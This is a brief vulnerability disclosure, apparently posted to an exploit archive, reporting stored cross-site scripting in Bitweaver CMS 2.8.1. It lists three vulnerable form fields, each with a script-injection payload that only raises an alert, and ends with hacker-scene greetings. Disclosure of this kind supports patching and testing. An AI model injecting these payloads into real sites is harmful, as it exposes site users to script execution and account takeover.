____/\______.__ ________ _________ _____ ____/\__ ____/\__ _____ ____/\__ ____/\______ / / /_/_ | | \_____ \ ___\______ \ / ___ \/ / /_// / /_/ / ___ \/ / /_// / /_/_ | ____ \__/ / \ | | | _(__ < / \ / / / / ._\ \__/ / \ \__/ / \ / / ._\ \__/ / \ \__/ / \ | |/ \ / / / \| | |__/ \ | \/ / < \_____/ / / \/ / / < \_____/ / / \/ / / \| | | \ /_/ /__ /|___|____/______ /___| /____/ \_____\/_/ /__ /_/ /__ /\_____\/_/ /__ /_/ /__ /|___|___| / \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ------------------------------------------------------------------------------ ------------------------------------------------------------------- TITLE: Bitweaver CMS Multiple stored XSS Vendor: Bitweaver CMS Author: $1l3n7 @$$@$$17 Email: sil3ntb0t@gmail.com Download Link: https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download Versions: 2.8.1 Tested on: Windows7 ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Description : Bitweaver is an application framework for content management.It is a fully functional web application and CMS.It is truly open source, community driven, object oriented, and written in PHP. Use Smarty Templates and ADOdb to support many databases including Postgres, Firebird, Oracle, and MySQL. DEMO: A)Persistent XSS http://localhost/bitweaver/articles/index.php DEMO: http://localhost/bitweaver/articles/edit.php 1: In Author Name Field POST DATA= "'-->><script>alert(0)</script> 2: http://localhost/bitweaver/pigeonholes/edit_pigeonholes.php?action=create In title field POST DATA= "'-->><script>alert(0)</script> 3: http://localhost/bitweaver/events/edit.php In title field POST DATA= "'-->><script>alert(0)</script> ---------------------------------------------------------------------------- gr33t1ngs and ShOuTZ to r007k17-w and all my friends..